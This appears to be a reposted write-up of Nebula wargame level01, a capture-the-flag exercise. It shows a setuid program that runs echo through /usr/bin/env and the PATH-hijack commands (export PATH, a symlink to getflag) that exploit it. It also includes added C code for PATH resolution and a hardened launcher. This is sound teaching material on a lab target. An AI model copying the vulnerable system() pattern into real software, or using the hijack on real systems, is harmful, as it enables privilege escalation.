Nebula_level01
2015-01-28 01:48
http://www.kroosec.com/2012/10/nebula-level01.html
In level01 of the Nebula wargame, we are required to find a vulnerability that allows us to run arbitrary programs. The source code of flag01 is provided:
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
    gid_t gid;
    uid_t uid;

    /* adopt the effective (setuid) ids as real and saved ids as well */
    gid = getegid();
    uid = geteuid();

    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);

    /* "echo" is resolved by env through the caller-controlled PATH */
    system("/usr/bin/env echo and now what?");
}
The system() library call executes echo "and now what?":
level01@nebula:~$ ../flag01/flag01
and now what?
but instead of directly running /bin/echo, it uses /usr/bin/env to find the location of echo. Ever come across scripts starting with #!/usr/bin/env python? This is done for portability: hard-coding a path (such as /usr/bin/python) would not work when the Python interpreter is installed in a different location. How does env look for the specified program? It simply searches the directories listed in the PATH environment variable, starting from the first directory and going through them in order until it finds the requested program. Since flag01 runs with the flag01 account's effective ids (see the setresuid/setresgid calls above) but inherits the caller's environment, the caller decides where that search goes.
level01@nebula:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
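The search order described above is easy to get wrong in one's head, so here is an added example (my own code, not part of the original post or of the Nebula binaries) that re-implements the lookup env(1) and execvp(3) perform: walk the colon-separated PATH and return the first directory that holds an executable regular file of the requested name. It goes slightly beyond the post by handling the empty entry (a leading, trailing or doubled colon), which POSIX treats as the current directory. The self-check builds a constructed layout of two temporary directories (names and paths are assumptions) and confirms that an entry earlier in PATH shadows a later one.

```c
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>

/* Walk the colon-separated search path the way env(1)/execvp(3) do and
 * return the first "<dir>/<prog>" that is an executable regular file.
 * An empty entry ("" as in "a::b", or a leading/trailing ':') means the
 * current directory, one more reason an untrusted PATH is dangerous.
 * The hit is written into out (size outsz); returns 1 on hit, 0 on miss. */
int resolve_in_path(const char *prog, const char *path, char *out, size_t outsz)
{
    const char *p = path;
    for (;;) {
        const char *colon = strchr(p, ':');
        size_t len = colon ? (size_t)(colon - p) : strlen(p);
        const char *dir = len ? p : ".";     /* empty entry == "." */
        size_t dlen = len ? len : 1;
        int n = snprintf(out, outsz, "%.*s/%s", (int)dlen, dir, prog);
        struct stat st;
        if (n > 0 && (size_t)n < outsz &&
            stat(out, &st) == 0 && S_ISREG(st.st_mode) &&
            access(out, X_OK) == 0)
            return 1;
        if (!colon) break;
        p = colon + 1;
    }
    out[0] = '\0';
    return 0;
}

/* Constructed fixture: create an empty executable file at path. */
static int make_exec(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0755);
    if (fd < 0) return 0;
    close(fd);
    return chmod(path, 0755) == 0;
}

/* Constructed layout: two temp dirs on PATH, a fake "echo" first only in
 * the second one, then in the first one too.  Returns 1 when resolution
 * follows PATH order (earlier entry shadows later), 0 otherwise. */
int path_order_check(void)
{
    char d1[] = "/tmp/pathdemo1XXXXXX", d2[] = "/tmp/pathdemo2XXXXXX";
    if (!mkdtemp(d1) || !mkdtemp(d2)) return 0;
    char path[512], f1[256], f2[256], hit[512];
    snprintf(path, sizeof path, "%s:%s", d1, d2);
    snprintf(f1, sizeof f1, "%s/echo", d1);
    snprintf(f2, sizeof f2, "%s/echo", d2);
    int ok = 1;
    /* nothing planted yet: a miss */
    ok &= resolve_in_path("echo", path, hit, sizeof hit) == 0;
    /* only the second dir has it: found there */
    ok &= make_exec(f2);
    ok &= resolve_in_path("echo", path, hit, sizeof hit) == 1 && strcmp(hit, f2) == 0;
    /* an earlier dir that also has it shadows the later one */
    ok &= make_exec(f1);
    ok &= resolve_in_path("echo", path, hit, sizeof hit) == 1 && strcmp(hit, f1) == 0;
    unlink(f1); unlink(f2); rmdir(d1); rmdir(d2);
    return ok;
}

int main(void)
{
    char hit[512];
    const char *p = getenv("PATH");
    if (p && resolve_in_path("echo", p, hit, sizeof hit))
        printf("env would run: %s\n", hit);
    printf("path_order_check: %s\n", path_order_check() ? "ok" : "FAILED");
    return 0;
}
```

Run stand-alone it prints which echo the current shell's PATH would select; the point for a reviewer is that a setuid program which lets env do this lookup has delegated the choice of binary to its caller.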
How do we attack this program? We prepend to $PATH a directory in which we add a symbolic link named echo pointing to /bin/getflag.
First we prepend /home/level01 to $PATH:
level01@nebula:~$ export PATH=/home/level01/:$PATH
level01@nebula:~$ echo $PATH
/home/level01/:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
Now we create a symbolic link /home/level01/echo to /bin/getflag:
level01@nebula:~$ ln -s /bin/getflag echo
level01@nebula:~$ ls -l echo
lrwxrwxrwx 1 level01 level01 12 2012-10-28 12:32 echo -> /bin/getflag
Now flag01 will run our own /home/level01/echo, which is simply a symbolic link to /bin/getflag:
level01@nebula:~$ ../flag01/flag01
You have successfully executed getflag on a target account
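The fix for this class of bug is to stop trusting the inherited environment: name the program by absolute path, hand the child a fixed minimal environment, and skip the shell entirely. The following is an added example (my own code, not from the post or from Nebula) of such a launcher next to the original system() pattern. Its self-check plants a fake echo first on PATH inside a constructed temporary directory (names are assumptions) and confirms that the original call runs the planted file while the hardened launcher does not.

```c
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/wait.h>

/* Hardened replacement for system("/usr/bin/env echo ..."):
 *  - the program is an absolute path, never resolved through PATH;
 *  - the child gets a fixed minimal environment, so no inherited PATH,
 *    IFS, LD_* or similar variable steers what gets executed;
 *  - execve() is called directly, so no shell parses the command line.
 * Returns the child's exit status, or -1 on error or refusal. */
int run_fixed(const char *abs_path, char *const argv[])
{
    static char *const clean_env[] = { "PATH=/usr/bin:/bin", NULL };
    if (abs_path == NULL || abs_path[0] != '/')
        return -1;                      /* refuse relative names outright */
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(abs_path, argv, clean_env);
        _exit(127);                     /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* The pattern from flag01, kept only so the self-check can contrast it. */
int run_via_env_unsafe(void)
{
    return system("/usr/bin/env echo and now what?");
}

/* Constructed fixture: write an executable shell script at path. */
static int write_script(const char *path, const char *body)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0755);
    if (fd < 0) return 0;
    ssize_t n = write(fd, body, strlen(body));
    close(fd);
    return n == (ssize_t)strlen(body);
}

/* Plant a fake "echo" first on PATH that drops a marker file, then run
 * both launchers.  Returns 1 when the unsafe call executed the planted
 * file and the hardened one did not, 0 otherwise. */
int launcher_check(void)
{
    char dir[] = "/tmp/pathfixXXXXXX";
    if (!mkdtemp(dir)) return 0;
    char fake[256], marker[256], path[1024], body[256];
    snprintf(fake, sizeof fake, "%s/echo", dir);
    snprintf(marker, sizeof marker, "%s/ran", dir);
    snprintf(body, sizeof body, "#!/bin/sh\n: > '%s'\n", marker);
    if (!write_script(fake, body)) return 0;
    const char *old = getenv("PATH");
    snprintf(path, sizeof path, "%s:%s", dir, old ? old : "/usr/bin:/bin");
    setenv("PATH", path, 1);

    struct stat st;
    int unsafe_hit = run_via_env_unsafe() == 0 && stat(marker, &st) == 0;
    unlink(marker);

    char *const argv[] = { "echo", "and now what?", NULL };
    int safe_status = run_fixed("/bin/echo", argv);
    int safe_hit = stat(marker, &st) == 0;

    if (old) setenv("PATH", old, 1);
    unlink(fake); unlink(marker); rmdir(dir);
    return unsafe_hit && safe_status == 0 && !safe_hit;
}

int main(void)
{
    printf("launcher_check: %s\n", launcher_check() ? "ok" : "FAILED");
    return 0;
}
```

When auditing a setuid binary, every system(), popen(), execlp()/execvp() or "/usr/bin/env" call is a finding of this kind; the alternatives are an absolute path with a clean environment as above, or, if PATH must be used at all, setting it to a trusted value with setenv() before the lookup.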
Posted 28th October 2012 by Hani Benhabiles